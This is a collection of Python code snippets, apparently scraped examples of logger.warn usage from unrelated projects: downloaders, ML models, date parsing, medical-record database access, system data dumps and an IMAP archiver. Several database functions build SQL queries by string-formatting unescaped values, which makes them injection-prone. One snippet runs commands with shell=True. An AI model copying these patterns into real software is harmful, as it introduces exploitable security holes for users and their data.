示例#1
0
def download_img_file(src_url, file_path):
    """
    外部URL下载文件接口
    :param src_url: URL
    :param file_path: 下载文件存放路径
    :return:
            result_code: True 下载文件成功,下载文件失败
            file_path:对应文件可能存在,可能不存在,result_code为True的时候一定存在
    """

    if src_url is None:
        raise ValueError("download url file url param or url_md5 param is None")

    url_res = urlparse.urlparse(src_url)
    if url_res is None:
        raise ValueError("parse %s url is error, please check this url" % src_url)

    url_scheme = url_res.scheme
    if url_scheme != "http" and url_scheme != "https":
        raise ValueError("only support http or https scheme url:%s" % src_url)

    try:
        result_code, download_label = __do_download_file(src_url, file_path)
    except Exception as e:
        logger.warn("do download %s url file error: %s" % (src_url, str(e)))
        download_label = "request_url_failure"
        result_code = False

    if not result_code:
        logger.warn("do download %s url file error: %s" % (src_url, download_label))
    return result_code
示例#2
0
    def __init__(self,
                 imgh=32,
                 imgw=100,
                 input_channel=1,
                 output_channel=512,
                 hidden_size=256,
                 num_fiducial=20,
                 num_class=41,
                 bilstm=True,
                 device=torch.device('cuda:0')):
        super(Model, self).__init__()

        logger.info(
            f'bi-lstm: {bilstm} | device: {device} | num_class: {num_class}')
        self.num_class = num_class
        self.bilstm = bilstm

        self.transformation = TPS_STN(num_fiducial,
                                      I_size=(imgh, imgw),
                                      I_r_size=(imgh, imgw),
                                      device=device,
                                      I_channel_num=input_channel)
        self.fe = ResNet50(input_channel, output_channel)

        self.adaptive_avg_pool = nn.AdaptiveAvgPool2d((None, 1))
        self.seq = nn.Sequential(
            BiLSTM(output_channel, hidden_size, hidden_size),
            BiLSTM(hidden_size, hidden_size, hidden_size))
        if self.bilstm:
            self.seq_out_channels = hidden_size
        else:
            logger.warn('There is no sequence model specified')
            self.seq_out_channels = output_channel
        self.prediction = Transformer(self.num_class, self.seq_out_channels)
示例#3
0
def parseDateStr(dateStr):
    ret = None
    if dateStr != "":
        fmts = [
            "%B %d, %Y",  #vice, infowars, mic, spin
            "%m/%d/%y %H:%M%p", #kotaku, lifehacker, deadspin, gawker
            "%b %d, %Y %H:%M%p", #elitedaily
            "%Y-%m-%d", #eonline, etonline
            "%Y%m%d%H", #hollywoodreporter
            "%B %d, %Y | %H:%M%p", #pagesix
            "%d %b %Y at %H:%M", #rawstory
            "%m.%d.%y %H:%M %p", #thedailybeast
            "%b %d, %Y %H:%M %p", #townhall
            "%B %d, %Y @ %H:%M %p", #usmagazine
        ]

        for fmt in fmts:
            try:
                ret = datetime.strptime(dateStr, fmt)
                break
            except ValueError, e:
                logger.warn( u"parse `%s` error: %s", dateStr,e)
        if ret == None:
            #最后求助dateutil
            try:
                ret = parseDateString(dateStr, fuzzy=True)
            except Exception, e:
                logger.warn( u"parse `%s` error:%s", dateStr, e)
示例#4
0
def insert_questionnair_records(records):
    """
    将读取的问卷记录插入到数据库

    Parameters
    -----------
    records : list
        list of QuestionnaireRecord
    """
    conn = connect_database()
    with conn.cursor() as cur:
        for record in records:
            sql = 'insert into xy_wenjuan ' \
                  '(barcode, lbcode, lbname, qcode, question, answer) ' \
                  'VALUES ' \
                  '(\'%s\', \'%s\', \'%s\', \'%s\', \'%s\', \'%s\')' % (
                      record.tjid,
                      record.lbbm,
                      record.lbmc,
                      record.qcode,
                      record.question,
                      record.answer,
                  )
            try:
                logger.debug(sql)
                cur.execute(sql)
            except:
                logger.warn(
                    'Insertion fail when trying to insert %s!' % record.line
                )
        conn.commit()
    def __init__(self, exchange, symbol, bid, ask, action):
        # Set the attributes of the order.
        self.exchange = exchange
        self.symbol = symbol
        self.bid = bid
        self.ask = ask
        self.action = action

        # Process the action.
        ## It should come in the format [place_order, order_type, side, amount_proportion, price_percentage].
        self.place_order, self.order_type, self.side, amount_proportion, price_percentage = action

        ## Determine the price for the order using the bid-ask spread and the price percentage.
        if self.side == 'buy':
            self.price = ask * (1 + price_percentage)
        elif self.side == 'sell':
            self.price = bid * (1 + price_percentage)
        else:
            raise ValueError

        ## Determine the amount for the order using the available balance and the proportion.
        try:
            self.amount = amount_proportion * (exchange.fetch_balance()['BTC']['free'] / self.price)
        except TypeError as amount_calc_error:
            logger.warn("Error calculating order amount: " + amount_calc_error.message)
            self.amount = 0.0

        # Initialize the order ID to None.
        self.id = None
 def save(self):
   """Dump all data we can collect to tmp directory"""
   data_dir_timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
   data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
   data_dir_base = tempfile.mkdtemp(suffix='', prefix='%s-' % data_dir_prefix, dir=D_TMP)
   data_dir = os.path.join(data_dir_base, 'satellite-sanity')
   os.makedirs(data_dir)
   logger.debug("Saving to directory %s" % data_dir)
   for key in self.config['commands'].keys():
     data_file = os.path.join(data_dir, key)
     fd = open(data_file, 'w')
     try:
       for row in self[key]:
         fd.write("%s\n" % row)
     except DataNotAvailable:
       logger.warn("Failed when obtaining %s" % key)
     fd.close()
     if self[key] is not None:
         data_file_lines = len(self[key])
     else:
         data_file_lines = -1
     logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
   data_tarxz = "%s.tar.xz" % data_dir_base
   command = ['tar', '-cJf', data_tarxz, '-C', data_dir_base, 'satellite-sanity']
   logger.debug("Running %s" % command)
   process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
   stdout, stderr = process.communicate()
   assert len(stderr) == 0, "Compress failed with '%s' when running '%s'" % (stderr, command)
   logger.info("Saved to %s" % data_tarxz)
   return data_tarxz
示例#7
0
def scan_for_installers(dot_install_dir):
    installers = {}

    # Scan for every json file in 'installers'
    for installer in os.listdir(os.path.join(BASE_DIR, "installers")):
        if installer.endswith(".json"):
            with open(os.path.join(BASE_DIR, "installers", installer),
                      "rt") as installer_fp:
                # Replace the {DOT_INSTALL_DIR}
                file_contents = installer_fp.read()
                file_contents = file_contents.replace("{DOT_INSTALL_DIR}",
                                                      dot_install_dir)

                try:
                    # Add the install data to installers.
                    data = json.loads(file_contents)
                    name = installer[:-5]
                    if "module_name" in data.keys():
                        name = data["module_name"]

                    installers[name] = data
                except json.JSONDecodeError:  # It was not a valid json file.
                    logger.warn(
                        "{} is not a valid installer!".format(installer))

    return installers
示例#8
0
def get_questionnaire_result_from_database(tjid):
    """
    从数据库获取指定体检者的问卷调查信息

    Parameters
    -----------
    tjid : str
        specimen barcode

    Returns
    --------
    records : list
        list of QuestionnaireRecord object
    """
    records = []
    conn = connect_database()
    with conn.cursor() as cur:
        sql = 'select lbcode, lbname, qcode, question, answer ' \
              'from xy_wenjuan where barcode=\'%s\'' % tjid
        cur.execute(sql)
        all_res = cur.fetchall()
    if not all_res:
        logger.warn('找不到样本%s的问卷调查信息!' % tjid)
        return []
    for res in all_res:
        ques_record = QuestionnaireRecord()
        ques_record.tjid = tjid
        ques_record.lbbm = res[0]
        ques_record.lbmc = ensure_unicode(res[1])
        ques_record.qcode = res[2]
        ques_record.question = ensure_unicode(res[3])
        ques_record.answer = ensure_unicode(res[4])
        records.append(ques_record)
    return records
示例#9
0
async def fetch_data(url, data, headers):
    '''Helper for fetch data from url'''
    async with aiohttp.ClientSession() as session:
        async with session.post(url, data=data, headers=headers) as resp:
            if resp.status == 200:
                return await resp.text()
            logger.warn('Fetch data status failed. URL: {}, args: {},\
                         status: {}'.format(url, params, resp.status))
    return None
示例#10
0
    def __init__(self,
                 num_topics,
                 vocab_size,
                 t_hidden_size,
                 rho_size,
                 theta_act,
                 embeddings=None,
                 train_embeddings=True,
                 enc_drop=0.25):
        super(ETM, self).__init__()

        ## define hyperparameters
        self.num_topics = num_topics
        self.vocab_size = vocab_size
        self.t_hidden_size = t_hidden_size
        self.rho_size = rho_size
        self.enc_drop = enc_drop
        self.t_drop = nn.Dropout(enc_drop)

        self.theta_act = self.get_activation(theta_act)

        ## define the word embedding matrix \rho
        if embeddings is None:
            self.rho = nn.Linear(rho_size, vocab_size, bias=False)
        else:
            num_embeddings, embedding_dim = embeddings.size()
            if not embedding_dim == rho_size:
                logger.warn(
                    f"rho size overridden by Embedding size {embedding_dim}")
                rho_size = embedding_dim
                self.rho_size = embedding_dim
            emb_layer = nn.Embedding(num_embeddings, embedding_dim)
            emb_layer.load_state_dict({'weight': embeddings})
            if not train_embeddings:
                emb_layer.weight.requires_grad = False
            self.rho = emb_layer

        ## define the matrix containing the topic embeddings
        self.alphas = nn.Linear(
            rho_size, num_topics,
            bias=False)  #nn.Parameter(torch.randn(rho_size, num_topics))

        ## define variational distribution for \theta_{1:D} via amortizartion
        self.q_theta = nn.Sequential(
            nn.Linear(vocab_size, t_hidden_size),
            self.theta_act,
            nn.Linear(t_hidden_size, t_hidden_size),
            self.theta_act,
        )
        self.mu_q_theta = nn.Linear(t_hidden_size, num_topics, bias=True)
        self.logsigma_q_theta = nn.Linear(t_hidden_size, num_topics, bias=True)

        params = list(self.parameters())
        for param in params:
            self.weights_init(param)
示例#11
0
    def test_list(self):
        command = ["list"]

        channel = 'bottystuff'

        user = User(username="******")

        b = commands.PepsiCommand(command, channel, user)

        for p in Purchase.select():
            logger.warn(p.buyer)
            logger.warn(p.drink_type)
示例#12
0
def createTables():

    msg = None
    stat = None
    try:
        logger.warn("CREATING TABLES")
        db.create_all()
        msg = "Non existent tables created!"
        stat = Result.SUCCESS
    except Exception as ex:
        msg = str(ex)
        stat = Result.FAILURE

    return Result(data=msg, status=stat).toJSON()
示例#13
0
    def power_on_host(free_memory, cpus, delay=5, timeout=None):
        """
		Try to power on a node connecting with CLUES
		
		Args:
		- free_memory: amount of memory needed in the host.
		- cpus: number of cpus needed in the host.
		- delay: number of seconds to sleep when waiting the request to be served (default 5).
		- timeout: timeout (in secs) to wait the request to be served (default configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT).

		Return: True if a host has been powered on or False otherwise. 
		"""
        try:
            import configcli
            if not timeout:
                timeout = configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT
            clues_server = configcli.get_clues_proxy_from_config()
            success, r_id = clues_server.request_create(
                configcli.config_client.CLUES_SECRET_TOKEN, cpus, free_memory,
                1, "")

            if not success:
                logger.error("Error creating a CLUES request: %s" % r_id)
                return False

            now = time.time()

            served = False
            while not served:
                success, served = clues_server.request_wait(
                    configcli.config_client.CLUES_SECRET_TOKEN, r_id, 1)

                if success and served:
                    return True
                elif ((time.time() - now) > timeout):
                    return False
                else:
                    time.sleep(delay)

            return served
        except ImportError:
            logger.warn(
                "Error trying to import configcli. It seems that CLUES client library is not installed."
            )
            return False
        except Exception, ex:
            logger.warn("Error trying to power on a node with CLUES: %s" +
                        str(ex))
            return False
示例#14
0
def symlink(src, dst, is_directory=False):
    install_folder = "/".join(dst.split("/")[:-1])
    os.makedirs(install_folder, 0o755, exist_ok=True)

    # Remove file if it already exists
    if os.path.lexists(dst):
        logger.warn("{} exists. Deleting...".format(dst))

        if not os.path.isdir(dst) or os.path.islink(dst):
            os.remove(dst)
        else:
            shutil.rmtree(dst)

    logger.debug("Symlinking {} to {}.".format(src, dst))
    os.symlink(src, dst, target_is_directory=is_directory)
示例#15
0
 def init(self):
     addr = (self.ip, opt.udp_port)
     while True:
         try:
             sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
             sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
             sock.setblocking(0)
             sock.bind(addr)
             break
         except socket.error as e:
             logger.warn(e)
             logger.warn('restarting UDPServer')
             time.sleep(1)
     logger.info('UDP Server started on %s:%s' % addr)
     self.sock = sock
    def set_default_stats(cls):
        try:
            file_excution = FileExcution(NAMED_PATH_FILE)
            if file_excution.contents is None:
                logger.warn("Named.conf is not exist")
                pass

            # logger.debug("{}".format(str(file_excution.content)))
            stats_default = dict({"stats_map": dict()})
            views_default = set_view_default_named(file_excution)
            clients_default = set_clients_default_named(file_excution)
            servers_default = set_servers_default_named(file_excution)
        except Exception as ex:
            logger.error("AgentServer init error: {}".format(ex))
            logger.error(traceback.format_exc())
示例#17
0
def get_physical_examination_from_database(tjid, product):
    """
    从数据库获取指定体检号的体检信息记录

    Parameters
    -----------
    tjid : str
        specimen barcode
    product : str
        product name, like healthwise or cardiowise.

    Returns
    --------
    records : list
        list of PhysicalExaminationRecord object
    """
    records = []
    conn = connect_database()
    with conn.cursor() as cur:
        sql = 'select itemcode, itemname, result, unit, defvalue, ' \
              'class0, ksbm, orderitem ' \
              'from xy_tijian Where barcode=\'%s\'' % tjid
        cur.execute(sql)
        all_res = cur.fetchall()
    if not all_res:
        logger.warn('找不到样本%s的体检信息!' % tjid)
        return []
    for res in all_res:
        pe_record = PhysicalExaminationRecord()
        pe_record.tjid = tjid
        pe_record.item_code = res[0]
        pe_record.item_name = res[1]
        pe_record.check_result = res[2]
        pe_record.unit = res[3] if res[3] is not None else ''
        pe_record.def_value = ensure_unicode(convert_text2tex(res[4])) \
            if res[4] is not None else ''
        pe_record.class0 = ensure_unicode(res[5]) if res[4] is not None else ''
        pe_record.ksbm = res[6]
        pe_record.sfxmmc = ensure_unicode(res[7]) if res[7] is not None else ''
        # todo, Hard code, should be modified in future.
        if product == 'healthwise' and pe_record.class0 != u'基本指标':
            continue
        if product == 'cardiowise' and pe_record.class0 \
                not in [u'基本指标', u'心血管病风险筛查']:
            continue
        records.append(pe_record)
    return records
示例#18
0
    def resolve_address_google(self, address, **kwargs):
        try:
            encoded_address = encode(address)
            address = urllib.quote(encoded_address)

            url = "https://maps.googleapis.com/maps/api/geocode/json?address=%s&sensor=false&region=za&key=%s" % (address, configuration["environment"]["google_key"])
            response = urllib2.urlopen(url)
            js = response.read()
            try:
                js = json.loads(js)
            except ValueError:
                logger.exception("Error trying to resolve %s" % address)
                return None

            results = []
            if "status" in js and js["status"] != "OK": 
                logger.warn("Error trying to resolve %s - %s" % (address, js.get("error_message", "Generic Error")))
                return None

            if "results" in js and len(js["results"]) > 0:
                for result in js["results"]:

                    res = self.reject_partial_match(result)
                    if res: continue

                    if "reject_resolution_to_main_place" in kwargs:
                        try:
                            res = self.reject_resolution_to_main_place(result["formatted_address"], int(kwargs["reject_resolution_to_main_place"][0]))
                        except (ValueError, TypeError):
                            res = self.resolution_to_main_place(result["formatted_address"])
                        if res: continue

                    geom = result["geometry"]["location"]
                    results.append({
                        "lat" : geom["lat"],
                        "lng" : geom["lng"],   
                        "formatted_address" : result["formatted_address"],
                        "source" : "Google Geocoding API",
                    })

                if len(results) == 0: return None
                return results
        except Exception:
            logger.exception("Error trying to resolve %s" % address)
        return None
示例#19
0
def get_gene_test_result_from_database(tjid, test_product, phenotypes=None):

    """
    从数据库获取指定体检号和检测产品的基因检测结果

    Parameters
    ------------
    tjid : str
        specimen barcode
    test_product : str
        product name, like healthwise.
    phenotypes : list
        list of phenotype names

    Returns
    --------
    records : list
        list of GeneTestRecord object
    """
    records = []
    conn = connect_database()
    with conn.cursor() as cur:
        sql = 'select barcode, test_item, gene, result, category ' \
              'from gene_results ' \
              'where barcode=\'%s\' and lower(test_product)=\'%s\'' \
              '' % (tjid, test_product)
        cur.execute(sql)
        all_res = cur.fetchall()
    conn.close()
    if not all_res:
        logger.warn('找不到样本%s的基因检测结果!' % tjid)
        return []
    for res in all_res:
        gene_test_record = GeneTestRecord()
        gene_test_record.barcode = res[0]
        gene_test_record.test_item = ensure_unicode(res[1])
        gene_test_record.gene = res[2]
        gene_test_record.risk_level = ensure_unicode(res[3])
        gene_test_record.category = ensure_unicode(res[4])
        if phenotypes is None:
            records.append(gene_test_record)
        else:
            if gene_test_record.test_item in phenotypes:
                records.append(gene_test_record)
    return records
示例#20
0
 def save(self):
   """Dump all data we can collect to tmp directory"""
   data_dir_timestamp = datetime.datetime.now().strftime('%Y-%m-%d-%H-%M-%S')
   data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
   data_dir = tempfile.mkdtemp(suffix='', prefix=data_dir_prefix)
   logger.debug("Saving to directory %s" % data_dir)
   for key in self.config['commands'].keys():
     data_file = os.path.join(data_dir, key)
     fd = open(data_file, 'w')
     try:
       for row in self[key]:
         fd.write("%s\n" % row)
     except AssertionError:
       logger.warn("Failed when obtaining %s" % key)
     fd.close()
     data_file_lines = len(self[key]) if self[key] is not None else -1,
     logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
   return data_dir
示例#21
0
	def migrate_vm(self, vm_id, host_info, all_vms):
		"""
		Migrate one of the VMs of the host to free memory
		"""
		logger.debug("Migrating.")
		
		vm_to_migrate = self.select_vm_to_migrate(vm_id, host_info, all_vms)
		host_to_migrate = self.select_host_to_migrate(vm_to_migrate)
		if not host_to_migrate:
			logger.warn("There are no host with enough resources to host the VM " + str(vm_to_migrate.id))
			return False
	
		if not Config.ONLY_TEST:
			logger.debug("Migrate the VM %d to host %d" % (vm_to_migrate.id, host_to_migrate.id))
			return self.cmp.migrate(vm_to_migrate.id, host_to_migrate.id)
		else:
			logger.debug("No migrate. This is just a test.")
			return False
示例#22
0
文件: net.py 项目: docblades/PynDns
    def validate_response(self, response):
        codes = self.parse_response(response)
        logger.debug("Codes: %s", codes)
        
        error_codes = ['badauth', '!donator', 'notfqdn',
                       'nohost', 'numhost', 'abuse',
                       'badagent', 'good 127.0.0.1']
        warn_codes = ['dnserr', '911', 'nochg']
        
        for code in codes:
            if code in error_codes:
                logger.error("Response from DynDns: '{0}'".format(code))
                raise DynDnsResponseException(code, self.get_message_from_code(code))
            elif code in warn_codes:
                logger.warn("Response from DynDns: '{0}'".format(code))
                return False

        return True
示例#23
0
 def save(self):
     """Dump all data we can collect to tmp directory"""
     data_dir_timestamp = datetime.datetime.now().strftime(
         '%Y-%m-%d-%H-%M-%S')
     data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
     data_dir = tempfile.mkdtemp(suffix='', prefix=data_dir_prefix)
     logger.debug("Saving to directory %s" % data_dir)
     for key in self.config['commands'].keys():
         data_file = os.path.join(data_dir, key)
         fd = open(data_file, 'w')
         try:
             for row in self[key]:
                 fd.write("%s\n" % row)
         except AssertionError:
             logger.warn("Failed when obtaining %s" % key)
         fd.close()
         data_file_lines = len(self[key]) if self[key] is not None else -1,
         logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
     return data_dir
示例#24
0
	def power_on_host(free_memory, cpus, delay = 5, timeout = None):
		"""
		Try to power on a node connecting with CLUES
		
		Args:
		- free_memory: amount of memory needed in the host.
		- cpus: number of cpus needed in the host.
		- delay: number of seconds to sleep when waiting the request to be served (default 5).
		- timeout: timeout (in secs) to wait the request to be served (default configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT).

		Return: True if a host has been powered on or False otherwise. 
		"""
		try:
			import configcli
			if not timeout:
				timeout = configcli.config_client.CLUES_REQUEST_WAIT_TIMEOUT
			clues_server = configcli.get_clues_proxy_from_config()
			success, r_id = clues_server.request_create(configcli.config_client.CLUES_SECRET_TOKEN, cpus, free_memory, 1, "")
			
			if not success:
				logger.error("Error creating a CLUES request: %s" % r_id)
				return False
			
			now = time.time()
			
			served = False
			while not served:
				success, served = clues_server.request_wait(configcli.config_client.CLUES_SECRET_TOKEN, r_id, 1)
				
				if success and served:
					return True
				elif ((time.time() - now) > timeout):
					return False
				else:
					time.sleep(delay)
			
			return served
		except ImportError:
			logger.warn("Error trying to import configcli. It seems that CLUES client library is not installed.")
			return False
		except Exception, ex:
			logger.warn("Error trying to power on a node with CLUES: %s" + str(ex))
			return False
示例#25
0
文件: net.py 项目: docblades/PynDns
    def validate_response(self, response):
        codes = self.parse_response(response)
        logger.debug("Codes: %s", codes)

        error_codes = [
            'badauth', '!donator', 'notfqdn', 'nohost', 'numhost', 'abuse',
            'badagent', 'good 127.0.0.1'
        ]
        warn_codes = ['dnserr', '911', 'nochg']

        for code in codes:
            if code in error_codes:
                logger.error("Response from DynDns: '{0}'".format(code))
                raise DynDnsResponseException(code,
                                              self.get_message_from_code(code))
            elif code in warn_codes:
                logger.warn("Response from DynDns: '{0}'".format(code))
                return False

        return True
示例#26
0
    def migrate_vm(self, vm_id, host_info, all_vms):
        """
		Migrate one of the VMs of the host to free memory
		"""
        logger.debug("Migrating.")

        vm_to_migrate = self.select_vm_to_migrate(vm_id, host_info, all_vms)
        host_to_migrate = self.select_host_to_migrate(vm_to_migrate)
        if not host_to_migrate:
            logger.warn(
                "There are no host with enough resources to host the VM " +
                str(vm_to_migrate.id))
            return False

        if not Config.ONLY_TEST:
            logger.debug("Migrate the VM %d to host %d" %
                         (vm_to_migrate.id, host_to_migrate.id))
            return self.cmp.migrate(vm_to_migrate.id, host_to_migrate.id)
        else:
            logger.debug("No migrate. This is just a test.")
            return False
示例#27
0
def build_config(args):
    config = data.Config()

    if args.config:
        logger.debug('Loading file from --config')
        fp = args.config
    else:  #pragma: no cover
        logger.debug('Looking for a config file')
        fp = find_config_file()

    if fp:
        logger.debug('Found a config file. Loading.')
        try:
            config.from_file(fp)
        except data.InvalidConfiguration as ex:
            logger.warn(ex.message)

    logger.debug('Overwriting config params with command line args.')
    config.from_args(args)
    logger.debug('Running validation against config')
    config.validate()
    return config
示例#28
0
 def save(self):
     """Dump all data we can collect to tmp directory"""
     data_dir_timestamp = datetime.datetime.now().strftime(
         '%Y-%m-%d-%H-%M-%S')
     data_dir_prefix = 'satellite-sanity-save-%s' % data_dir_timestamp
     data_dir_base = tempfile.mkdtemp(suffix='',
                                      prefix='%s-' % data_dir_prefix,
                                      dir=D_TMP)
     data_dir = os.path.join(data_dir_base, 'satellite-sanity')
     os.makedirs(data_dir)
     logger.debug("Saving to directory %s" % data_dir)
     for key in self.config['commands'].keys():
         data_file = os.path.join(data_dir, key)
         fd = open(data_file, 'w')
         try:
             for row in self[key]:
                 fd.write("%s\n" % row)
         except DataNotAvailable:
             logger.warn("Failed when obtaining %s" % key)
         fd.close()
         if self[key] is not None:
             data_file_lines = len(self[key])
         else:
             data_file_lines = -1
         logger.debug("Saved %s lines to %s" % (data_file_lines, data_file))
     data_tarxz = "%s.tar.xz" % data_dir_base
     command = [
         'tar', '-cJf', data_tarxz, '-C', data_dir_base, 'satellite-sanity'
     ]
     logger.debug("Running %s" % command)
     process = subprocess.Popen(command,
                                stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE)
     stdout, stderr = process.communicate()
     assert len(
         stderr) == 0, "Compress failed with '%s' when running '%s'" % (
             stderr, command)
     logger.info("Saved to %s" % data_tarxz)
     return data_tarxz
示例#29
0
def build_config(args):
    config = data.Config()

    if args.config:
        logger.debug('Loading file from --config')
        fp = args.config
    else: #pragma: no cover
        logger.debug('Looking for a config file')
        fp = find_config_file()

    if fp:
        logger.debug('Found a config file. Loading.')
        try:
            config.from_file(fp)
        except data.InvalidConfiguration as ex:
            logger.warn(ex.message)

    logger.debug('Overwriting config params with command line args.')
    config.from_args(args)
    logger.debug('Running validation against config')
    config.validate()
    return config
示例#30
0
def insert_physical_examination_records(records):
    """
    将读取的体检记录插入到数据库

    Parameters
    -----------
    records : list
        list of PhysicalExaminationRecord
    """
    conn = connect_database()
    with conn.cursor() as cur:
        for record in records:
            sql = 'insert into xy_tijian ' \
                  '(barcode, class0, ksbm, orderitem, itemcode, itemname, ' \
                  'result, unit, defvalue) ' \
                  'VALUES ' \
                  '(\'%s\', \'%s\', \'%s\', \'%s\', \'%s\', \'%s\', \'%s\', ' \
                  '\'%s\', \'%s\')' % (
                      record.tjid,
                      record.class0,
                      record.ksbm,
                      record.sfxmmc,
                      record.item_code,
                      record.item_name,
                      record.check_result,
                      record.unit,
                      record.def_value,
                  )
            try:
                logger.debug(sql)
                cur.execute(sql)
            except:
                logger.warn(
                    'Insertion fail when trying to insert %s!' % record.line
                )
        conn.commit()
示例#31
0
 def __load(self, label):
     """Get output of coresponding command or if __data_dir is set load
    content of coresponding file and store it to self.__data[label].
    If command fails, usually "['']" is stored."""
     assert label not in self.__data
     # Are we running on live system or from directory?
     if not self.__data_dir:
         if label not in self.__access_list:
             self.__access_list[label] = self.config['commands'][label]
         # TODO: Add some timeouts, ulimit, nice... (?)
         logger.debug("Going to execute '%s' for '%s'" %
                      (self.config['commands'][label], label))
         # FIXME: is it OK to have shell=True here from secuity stand-point?
         process = subprocess.Popen([self.config['commands'][label]],
                                    shell=True,
                                    stdout=subprocess.PIPE,
                                    stderr=subprocess.PIPE)
         # FIXME: is this correct way to run this? Can not we got stuck when the data are too big?
         stdout, stderr = process.communicate()
         if len(stderr) != 0:
             logger.warn("Command '%s' failed with '%s'" %
                         (self.config['commands'][label], stderr))
             self.__data[label] = None
             raise DataNotAvailable(
                 "Command '%s' failed with '%s'" %
                 (self.config['commands'][label], stderr))
         self.__data[label] = stdout.strip().split("\n")
     else:
         our_file = None
         our_file_rel = None
         for relative_file in self.config['files'][label]:
             f = os.path.join(self.__data_dir, relative_file)
             if os.path.isfile(f):
                 our_file = f
                 our_file_rel = relative_file
                 break
         if our_file:
             logger.debug("Going to load '%s' for '%s'" % (f, label))
             if label not in self.__access_list:
                 self.__access_list[label] = our_file_rel
             try:
                 fp = open(f, 'r')
             except IOError:
                 logger.warn("Failed to load %s for %s" % (f, label))
                 self.__data[label] = None
                 raise DataNotAvailable("Failed to load %s for %s" %
                                        (f, label))
             self.__data[label] = fp.read().splitlines()
             fp.close()
         else:
             logger.warn("Suitable file for %s not found" % label)
             self.__data[label] = None
             raise DataNotAvailable("Suitable file for %s not found" %
                                    label)
示例#32
0
def stop():
    try:
        pid1 = int(open('/tmp/udp.pid').read())
        pid2 = int(open('/tmp/tcp.pid').read())
    except IOError:
        logger.warn('can not find any running server')
    else:
        try:
            os.kill(pid1, signal.SIGKILL)
            os.kill(pid2, signal.SIGKILL)
        except Exception, e:
            logger.warn('error when killing %s: %s' % (pid1, e))
            logger.warn('error when killing %s: %s' % (pid2, e))
        else:
 def __load(self, label):
   """Get output of coresponding command or if __data_dir is set load
      content of coresponding file and store it to self.__data[label].
      If command fails, usually "['']" is stored."""
   assert label not in self.__data
   # Are we running on live system or from directory?
   if not self.__data_dir:
     if label not in self.__access_list:
       self.__access_list[label] = self.config['commands'][label]
     # TODO: Add some timeouts, ulimit, nice... (?)
     logger.debug("Going to execute '%s' for '%s'" % (self.config['commands'][label], label))
     # FIXME: is it OK to have shell=True here from secuity stand-point?
     process = subprocess.Popen([self.config['commands'][label]], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
     # FIXME: is this correct way to run this? Can not we got stuck when the data are too big?
     stdout, stderr = process.communicate()
     if len(stderr) != 0:
       logger.warn("Command '%s' failed with '%s'" % (self.config['commands'][label], stderr))
       self.__data[label] = None
       raise DataNotAvailable("Command '%s' failed with '%s'" % (self.config['commands'][label], stderr))
     self.__data[label] = stdout.strip().split("\n")
   else:
     our_file = None
     our_file_rel = None
     for relative_file in self.config['files'][label]:
       f = os.path.join(self.__data_dir, relative_file)
       if os.path.isfile(f):
         our_file = f
         our_file_rel = relative_file
         break
     if our_file:
       logger.debug("Going to load '%s' for '%s'" % (f, label))
       if label not in self.__access_list:
         self.__access_list[label] = our_file_rel
       try:
         fp = open(f, 'r')
       except IOError:
         logger.warn("Failed to load %s for %s" % (f, label))
         self.__data[label] = None
         raise DataNotAvailable("Failed to load %s for %s" % (f, label))
       self.__data[label] = fp.read().splitlines()
       fp.close()
     else:
       logger.warn("Suitable file for %s not found" % label)
       self.__data[label] = None
       raise DataNotAvailable("Suitable file for %s not found" % label)
示例#34
0
def get_email_domain(email):
    at_pos = email.find("@")
    if at_pos == -1:
        logger.warn("from_email format is invalid")
        return None
    return email[at_pos + 1:]
示例#35
0
        logger.warn('can not find any running server')
    else:
        try:
            os.kill(pid1, signal.SIGKILL)
            os.kill(pid2, signal.SIGKILL)
        except Exception, e:
            logger.warn('error when killing %s: %s' % (pid1, e))
            logger.warn('error when killing %s: %s' % (pid2, e))
        else:
            logger.info('Process udp and tcp killed')
            try:
                os.remove('/tmp/udp.pid')
                os.remove('/tmp/tcp.pid')
                sys.exit(0)
            except OSError, e:
                logger.warn('remove pid file failed: %s' % e)


class Emulator():
    def __init__(self, ifname, host, ip, send_err, file_path, test):
        self.ifname = ifname
        self.host = host
        self.ip = ip
        self.send_err = send_err
        self.file_path = file_path
        self.test = test

    def run(self):
        UDPServer(self.ifname, self.ip, self.test).start()
        TCPClient(self.host, self.ip, self.send_err,
                  self.file_path, self.test).start()
示例#36
0
 def reconnect(self):
     self.io_loop.add_timeout(
         datetime.timedelta(seconds=1),
         self.connect
     )
     logger.warn('Reestablishing TCP connection to %s' % repr(self.target))
示例#37
0
def error(update, err):
    logger.warn('Update "%s" caused error "%s"' % (update, err))
示例#38
0
def run_archiver(parents=[], logger=logger):

    # if we're given parents, third-party sw wants to mix with the barebones parser
    bbones = True if parents else False
    argparser = get_parser(parents=parents, barebones=bbones)
    args = argparser.parse_args()

    loglevel= getattr(logging, args.loglevel.upper())
    logger.setLevel(loglevel)

    # Require either archival or listing operation before proceeding.
    if not (args.list_folders or args.archivedir):
        argparser.print_help()
        sys.exit()

    # Auth & connect
    username = args.username or raw_input("Username: "******"Connected")

       # Get folder listing and folder path separator from server; they will be needed.
       # Also make a slash ('/') -delimited list of all folders for convenience.
       # Note: an IMAP folder entry contains the full path, not just the leaf.
       folders = [fdata[2] for fdata in imapcon.list_folders()]
       fsep = imapcon.namespace().personal[0][1]
       folders_slashdelimited = [fname.replace(fsep, u'/') for fname in folders]

       # If requested (-f/--folders), just output it & exit
       if args.list_folders:
          sys.exit("Folders on server: %s" % ", ".join(folders_slashdelimited))

       # Apply include/exclude options on the list of folders found on server, after
       # making sure they exist on server.
       invalids = []
       if args.include:
           invalids += [fld for fld in args.include if fld not in folders_slashdelimited]
       if args.exclude:
           invalids += [fld for fld in args.exclude if fld not in folders_slashdelimited]
       if invalids:
           sys.exit("Invalid include/exclude folder names: '%s'" % invalids)
